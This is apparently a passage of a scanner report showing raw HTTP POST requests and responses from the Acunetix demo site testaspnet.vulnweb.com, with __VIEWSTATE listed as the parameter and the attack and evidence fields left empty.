href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8149&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAIWCFJdoIZGRk1zaIBBSl2Tfr%2BQVH%2Bh%2BAjxNyc4Y%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKp4LOXDgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPSV5xdvML3wti2fc5FxFAXb2uuPo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:44:27 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAIWCFJdoIZGRk1zaIBBSl2Tfr+QVH+h+AjxNyc4Y=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKp4LOXDgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPSV5xdvML3wti2fc5FxFAXb2uuPo=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:White" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8165&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAvQYYMtoIZGRk2Uje5FG2mDeDPuzsww7n9%2B31cQw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL129nKDgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPyVKjd35lCXzwSB2Rxapx7yomF3k%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:24:14 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAvQYYMtoIZGRk2Uje5FG2mDeDPuzsww7n9+31cQw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL129nKDgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPyVKjd35lCXzwSB2Rxapx7yomF3k=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:White" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a 